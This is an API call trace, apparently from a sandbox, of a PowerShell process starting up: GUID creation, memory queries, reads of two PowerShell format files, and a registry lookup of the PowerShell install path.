	[0412.559] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x1b657d4e, Data2=0xfd03, Data3=0x4238, Data4=([0]=0x8b, [1]=0x2f, [2]=0x4f, [3]=0xf5, [4]=0xb9, [5]=0xdc, [6]=0xe6, [7]=0x76))) returned 0x0
	[0412.559] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x4e172758, Data2=0x54ad, Data3=0x4d73, Data4=([0]=0x84, [1]=0x15, [2]=0x91, [3]=0x89, [4]=0xdd, [5]=0xf9, [6]=0xa8, [7]=0x92))) returned 0x0
	[0412.560] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xdc0b70d7, Data2=0x5115, Data3=0x426b, Data4=([0]=0xbe, [1]=0x82, [2]=0xf2, [3]=0x53, [4]=0x88, [5]=0xa3, [6]=0x7f, [7]=0xc6))) returned 0x0
	[0412.560] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x10e2fa88, Data2=0xc56, Data3=0x4ea6, Data4=([0]=0x9c, [1]=0x89, [2]=0x4d, [3]=0xaa, [4]=0xeb, [5]=0xe8, [6]=0x2e, [7]=0xe2))) returned 0x0
	[0412.560] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x3b7c239a, Data2=0x6c17, Data3=0x48af, Data4=([0]=0x91, [1]=0xd8, [2]=0x8e, [3]=0x9b, [4]=0x10, [5]=0x9, [6]=0x55, [7]=0x84))) returned 0x0
	[0412.560] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x9418f6d2, Data2=0xd4f8, Data3=0x4ca4, Data4=([0]=0xb3, [1]=0x27, [2]=0x86, [3]=0x80, [4]=0xd0, [5]=0x67, [6]=0xa0, [7]=0xb0))) returned 0x0
	[0412.560] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.560] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.560] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.560] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x57d671f0, Data2=0x4ef3, Data3=0x4cd0, Data4=([0]=0x83, [1]=0xba, [2]=0x83, [3]=0x8, [4]=0x6d, [5]=0xc1, [6]=0xe, [7]=0x28))) returned 0x0
	[0412.560] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x2bcc9ab0, Data2=0x51b, Data3=0x4c02, Data4=([0]=0xaf, [1]=0x38, [2]=0x96, [3]=0xe8, [4]=0x2, [5]=0x5b, [6]=0xeb, [7]=0x63))) returned 0x0
	[0412.561] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xd8dfe2fa, Data2=0x7337, Data3=0x49c5, Data4=([0]=0xa5, [1]=0xa2, [2]=0xcb, [3]=0x50, [4]=0xc1, [5]=0x4a, [6]=0x20, [7]=0xca))) returned 0x0
	[0412.561] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x5947608d, Data2=0x7c48, Data3=0x4209, Data4=([0]=0x8b, [1]=0xcc, [2]=0x44, [3]=0x68, [4]=0x13, [5]=0xdb, [6]=0x5a, [7]=0x33))) returned 0x0
	[0412.561] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x1ed28278, Data2=0xbe5e, Data3=0x4213, Data4=([0]=0x86, [1]=0xa0, [2]=0x2e, [3]=0xc6, [4]=0x96, [5]=0x68, [6]=0xda, [7]=0xad))) returned 0x0
	[0412.561] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xbb084e74, Data2=0xcbff, Data3=0x43b4, Data4=([0]=0x80, [1]=0x25, [2]=0x78, [3]=0xac, [4]=0xdd, [5]=0x70, [6]=0x16, [7]=0x59))) returned 0x0
	[0412.561] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xba4d5c16, Data2=0x8c3c, Data3=0x4311, Data4=([0]=0xa6, [1]=0x63, [2]=0xbd, [3]=0x6e, [4]=0x6b, [5]=0xb4, [6]=0x2f, [7]=0xa0))) returned 0x0
	[0412.561] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xfc8d623c, Data2=0xa4ae, Data3=0x441b, Data4=([0]=0x97, [1]=0x27, [2]=0xb1, [3]=0xb, [4]=0xe9, [5]=0x8e, [6]=0x3b, [7]=0x8d))) returned 0x0
	[0412.561] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x572265e9, Data2=0x1242, Data3=0x40d7, Data4=([0]=0x84, [1]=0xd3, [2]=0x57, [3]=0x15, [4]=0xe0, [5]=0xbe, [6]=0x3f, [7]=0x4e))) returned 0x0
	[0412.561] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x5c97143a, Data2=0x3531, Data3=0x4e18, Data4=([0]=0xac, [1]=0x36, [2]=0x48, [3]=0x86, [4]=0xfa, [5]=0x32, [6]=0xd, [7]=0x5b))) returned 0x0
	[0412.561] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x53024ca7, Data2=0xdfe3, Data3=0x4211, Data4=([0]=0xad, [1]=0xf5, [2]=0xcd, [3]=0xf4, [4]=0x60, [5]=0x12, [6]=0x41, [7]=0x6b))) returned 0x0
	[0412.561] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xcad40a57, Data2=0x43b4, Data3=0x43be, Data4=([0]=0xba, [1]=0x35, [2]=0xcf, [3]=0xc, [4]=0xf2, [5]=0x90, [6]=0x22, [7]=0x44))) returned 0x0
	[0412.561] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x2e145e77, Data2=0xd0f5, Data3=0x485d, Data4=([0]=0xa2, [1]=0xd5, [2]=0x3d, [3]=0xa, [4]=0x3c, [5]=0xf, [6]=0x8e, [7]=0xf))) returned 0x0
	[0412.562] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.562] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x5def463c, Data2=0xf6c5, Data3=0x4b85, Data4=([0]=0xac, [1]=0xc4, [2]=0x7e, [3]=0xd1, [4]=0xe9, [5]=0x5a, [6]=0x9f, [7]=0x8f))) returned 0x0
	[0412.562] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.562] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.563] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x90f9a7b1, Data2=0x45e2, Data3=0x4b69, Data4=([0]=0xb2, [1]=0xa4, [2]=0x56, [3]=0xac, [4]=0x64, [5]=0x46, [6]=0x65, [7]=0x62))) returned 0x0
	[0412.563] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.563] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x34e96ed3, Data2=0x319d, Data3=0x424f, Data4=([0]=0x85, [1]=0xa8, [2]=0x6f, [3]=0xe8, [4]=0xde, [5]=0xe2, [6]=0xfb, [7]=0x7e))) returned 0x0
	[0412.563] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xc9efe364, Data2=0xb7c6, Data3=0x4f7f, Data4=([0]=0xb8, [1]=0xbc, [2]=0xf0, [3]=0xba, [4]=0x45, [5]=0x65, [6]=0x6a, [7]=0x58))) returned 0x0
	[0412.563] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x1f12060, Data2=0x248b, Data3=0x46d0, Data4=([0]=0xa8, [1]=0xb3, [2]=0x56, [3]=0xd, [4]=0xe5, [5]=0x1f, [6]=0x2c, [7]=0x4b))) returned 0x0
	[0412.563] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x74c1f693, Data2=0x6ae0, Data3=0x446e, Data4=([0]=0x92, [1]=0xaa, [2]=0x2b, [3]=0x3a, [4]=0xd3, [5]=0x1a, [6]=0xad, [7]=0x4f))) returned 0x0
	[0412.563] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xa467d441, Data2=0x2f46, Data3=0x444b, Data4=([0]=0x9a, [1]=0xce, [2]=0x72, [3]=0x9d, [4]=0x3d, [5]=0xa7, [6]=0x60, [7]=0xf4))) returned 0x0
	[0412.563] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xcacd8e37, Data2=0x7fab, Data3=0x451f, Data4=([0]=0xb1, [1]=0x69, [2]=0x5, [3]=0x5d, [4]=0x73, [5]=0x2f, [6]=0xc, [7]=0x1d))) returned 0x0
	[0412.564] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xd1ee5b59, Data2=0xb512, Data3=0x4431, Data4=([0]=0xb1, [1]=0xd5, [2]=0x9c, [3]=0xb9, [4]=0x46, [5]=0xfe, [6]=0x63, [7]=0x20))) returned 0x0
	[0412.564] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.564] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x946fad72, Data2=0xad96, Data3=0x4767, Data4=([0]=0xa2, [1]=0x8a, [2]=0x34, [3]=0x2b, [4]=0x6f, [5]=0x79, [6]=0xce, [7]=0x10))) returned 0x0
	[0412.564] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xa3e78ba4, Data2=0xf65d, Data3=0x4686, Data4=([0]=0x81, [1]=0xb1, [2]=0xc6, [3]=0x4e, [4]=0x9b, [5]=0x55, [6]=0xa, [7]=0x1e))) returned 0x0
	[0412.564] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x835f498f, Data2=0x263d, Data3=0x476d, Data4=([0]=0xb6, [1]=0xa1, [2]=0xf0, [3]=0x3e, [4]=0x7c, [5]=0xa1, [6]=0x42, [7]=0xf7))) returned 0x0
	[0412.564] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x86356973, Data2=0x34a5, Data3=0x47ba, Data4=([0]=0xb7, [1]=0x25, [2]=0x34, [3]=0x62, [4]=0x18, [5]=0xd3, [6]=0x8a, [7]=0x47))) returned 0x0
	[0412.564] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x8d8729ca, Data2=0x498b, Data3=0x4eed, Data4=([0]=0x97, [1]=0x7f, [2]=0x21, [3]=0x8e, [4]=0xbd, [5]=0x24, [6]=0xf9, [7]=0x53))) returned 0x0
	[0412.564] VirtualQuery (in: lpAddress=0xcbc00, lpBuffer=0xccac0, dwLength=0x30 | out: lpBuffer=0xccac0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.564] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x76695f27, Data2=0x99dd, Data3=0x4f5c, Data4=([0]=0x90, [1]=0x99, [2]=0xdd, [3]=0xb0, [4]=0x79, [5]=0x45, [6]=0x55, [7]=0x7a))) returned 0x0
	[0412.565] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x358ca57d, Data2=0x8bf7, Data3=0x4717, Data4=([0]=0x8f, [1]=0xb2, [2]=0x3c, [3]=0x3c, [4]=0xe0, [5]=0x21, [6]=0x85, [7]=0xc5))) returned 0x0
	[0412.565] VirtualQuery (in: lpAddress=0xcbc70, lpBuffer=0xccb30, dwLength=0x30 | out: lpBuffer=0xccb30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.565] VirtualQuery (in: lpAddress=0xcbc70, lpBuffer=0xccb30, dwLength=0x30 | out: lpBuffer=0xccb30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.565] VirtualQuery (in: lpAddress=0xcbc70, lpBuffer=0xccb30, dwLength=0x30 | out: lpBuffer=0xccb30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.565] VirtualQuery (in: lpAddress=0xcbc70, lpBuffer=0xccb30, dwLength=0x30 | out: lpBuffer=0xccb30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.565] SetErrorMode (uMode=0x1) returned 0x1
	[0412.565] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0412.565] GetFileType (hFile=0x2fc) returned 0x1
	[0412.566] SetErrorMode (uMode=0x1) returned 0x1
	[0412.566] GetFileType (hFile=0x2fc) returned 0x1
	[0412.566] ReadFile (in: hFile=0x2fc, lpBuffer=0x31e2d38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x31e2d38*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.567] ReadFile (in: hFile=0x2fc, lpBuffer=0x31e2d38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x31e2d38*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.567] ReadFile (in: hFile=0x2fc, lpBuffer=0x31e2d38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x31e2d38*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.567] ReadFile (in: hFile=0x2fc, lpBuffer=0x31e2d38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x31e2d38*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.567] ReadFile (in: hFile=0x2fc, lpBuffer=0x31e2d38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x31e2d38*, lpNumberOfBytesRead=0xccf98*=0x8b4, lpOverlapped=0x0) returned 1
	[0412.567] ReadFile (in: hFile=0x2fc, lpBuffer=0x31e2154, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x31e2154*, lpNumberOfBytesRead=0xccf98*=0x0, lpOverlapped=0x0) returned 1
	[0412.567] ReadFile (in: hFile=0x2fc, lpBuffer=0x31e2d38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x31e2d38*, lpNumberOfBytesRead=0xccf98*=0x0, lpOverlapped=0x0) returned 1
	[0412.567] CloseHandle (hObject=0x2fc) returned 1
	[0412.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0412.568] SetErrorMode (uMode=0x1) returned 0x1
	[0412.568] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf40 | out: lpFileInformation=0xccf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0412.568] SetErrorMode (uMode=0x1) returned 0x1
	[0412.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0412.568] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd028 | out: phkResult=0xcd028*=0x2fc) returned 0x0
	[0412.568] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfac, lpData=0x0, lpcbData=0xccfa8*=0x0 | out: lpType=0xccfac*=0x1, lpData=0x0, lpcbData=0xccfa8*=0x56) returned 0x0
	[0412.568] CoTaskMemAlloc (cb=0x5a) returned 0x1ffce0
	[0412.568] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf7c, lpData=0x1ffce0, lpcbData=0xccf78*=0x56 | out: lpType=0xccf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf78*=0x56) returned 0x0
	[0412.568] CoTaskMemFree (pv=0x1ffce0) 
	[0412.568] RegCloseKey (hKey=0x2fc) returned 0x0
	[0412.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0412.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0412.569] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xfe37e289, Data2=0xa372, Data3=0x421a, Data4=([0]=0xb6, [1]=0xe9, [2]=0xb6, [3]=0x34, [4]=0xac, [5]=0x1c, [6]=0x62, [7]=0x85))) returned 0x0
	[0412.569] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xb240e96, Data2=0x9b1, Data3=0x4d52, Data4=([0]=0xac, [1]=0xc5, [2]=0xb5, [3]=0x2d, [4]=0xca, [5]=0x97, [6]=0xcb, [7]=0x4c))) returned 0x0
	[0412.569] SetErrorMode (uMode=0x1) returned 0x1
	[0412.569] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0412.569] GetFileType (hFile=0x2fc) returned 0x1
	[0412.569] SetErrorMode (uMode=0x1) returned 0x1
	[0412.569] GetFileType (hFile=0x2fc) returned 0x1
	[0412.569] ReadFile (in: hFile=0x2fc, lpBuffer=0x3220b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x3220b20*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.570] ReadFile (in: hFile=0x2fc, lpBuffer=0x3220b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x3220b20*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.570] ReadFile (in: hFile=0x2fc, lpBuffer=0x3220b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x3220b20*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.570] ReadFile (in: hFile=0x2fc, lpBuffer=0x3220b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x3220b20*, lpNumberOfBytesRead=0xccf98*=0x1000, lpOverlapped=0x0) returned 1
	[0412.571] ReadFile (in: hFile=0x2fc, lpBuffer=0x3220b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x3220b20*, lpNumberOfBytesRead=0xccf98*=0xe98, lpOverlapped=0x0) returned 1
	[0412.571] ReadFile (in: hFile=0x2fc, lpBuffer=0x3220120, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x3220120*, lpNumberOfBytesRead=0xccf98*=0x0, lpOverlapped=0x0) returned 1
	[0412.571] ReadFile (in: hFile=0x2fc, lpBuffer=0x3220b20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf98, lpOverlapped=0x0 | out: lpBuffer=0x3220b20*, lpNumberOfBytesRead=0xccf98*=0x0, lpOverlapped=0x0) returned 1
	[0412.571] CloseHandle (hObject=0x2fc) returned 1
	[0412.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0412.571] SetErrorMode (uMode=0x1) returned 0x1
	[0412.571] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf40 | out: lpFileInformation=0xccf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0412.571] SetErrorMode (uMode=0x1) returned 0x1
	[0412.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0412.572] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd028 | out: phkResult=0xcd028*=0x2fc) returned 0x0
	[0412.572] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfac, lpData=0x0, lpcbData=0xccfa8*=0x0 | out: lpType=0xccfac*=0x1, lpData=0x0, lpcbData=0xccfa8*=0x56) returned 0x0
	[0412.572] CoTaskMemAlloc (cb=0x5a) returned 0x1ffce0
	[0412.572] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf7c, lpData=0x1ffce0, lpcbData=0xccf78*=0x56 | out: lpType=0xccf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf78*=0x56) returned 0x0
	[0412.572] CoTaskMemFree (pv=0x1ffce0) 
	[0412.572] RegCloseKey (hKey=0x2fc) returned 0x0
	[0412.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0412.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0412.573] VirtualQuery (in: lpAddress=0xcbac0, lpBuffer=0xcc980, dwLength=0x30 | out: lpBuffer=0xcc980*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.573] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x29e82005, Data2=0xa066, Data3=0x434f, Data4=([0]=0xbf, [1]=0x8a, [2]=0x6d, [3]=0x81, [4]=0xb3, [5]=0x3f, [6]=0xf8, [7]=0xae))) returned 0x0
	[0412.573] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xe020d4f9, Data2=0xbb75, Data3=0x4b1d, Data4=([0]=0xab, [1]=0x80, [2]=0x46, [3]=0x9, [4]=0xd0, [5]=0x9c, [6]=0x0, [7]=0xbd))) returned 0x0
	[0412.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
